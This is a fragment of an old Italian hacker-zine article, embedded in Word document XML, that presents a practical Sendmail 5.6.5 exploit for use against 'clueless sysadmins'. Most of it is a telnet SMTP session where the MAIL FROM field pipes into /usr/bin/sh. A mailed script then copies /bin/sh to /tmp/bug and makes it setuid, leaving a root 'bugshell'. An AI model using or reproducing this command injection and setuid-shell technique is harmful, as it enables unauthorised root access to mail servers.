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lang w:val="it-IT"/>
        </w:rPr>
        <w:t>SENDMAIL 5.6.5 EXPLO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aaalvee lo so ke vi starete chiedendo perkè invece di scrivere un articolo su qualcosa di recente perdo tempo con un versione vecchia di sendmail...semplice:perkè è ancora parecchio diffus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 la trovate su qualke server vuol dire ke il sysadmin non è proprio un genio e se ha lasciato una versione così vecchia non dovrebbe essersi preoccupato di patchare il tut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mq passiamo al dunque..tutto quello ke dovrete fare è molto semplice e lo riporto con un esempio pratic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[/home/SoSpiro] |% telnet sysadmfesso.com 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ying 99.88.77.66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nected to sysadmfesso.c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cape character is '^]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20 sysadmfesso.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 25 Oct 1999 20:31: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05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E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50 Hello sysadmfesso.c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L FROM: |/usr/ucb/tail|/usr/bin/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50 |/usr/ucb/tail|/usr/bin/sh... Sender o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CPT TO: ro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50 root... Recipient o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354 Enter mail, end with @.@ on a line by it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From: sospiro"sysadmfesso.c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To: sospiro"panix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Return-Receipt-To: |foob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Subject: Andiam andiam andiamo a buk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X-Disclaimer: INFORMATION WANTS TO BE F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#!/bin/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p /bin/sh /tmp/bug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mod u+s /tmp/bug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chmod ugo+rx /tmp/bug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50 O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221 sysadmfesso.com closing conn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esso avrete una bella "bugshell" nella directory /tm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 stanco,so stuf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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>SoSpiRo &gt;&gt;&gt;"SunSetZEr0 CreW" --&gt;http://sunset0.tsx.org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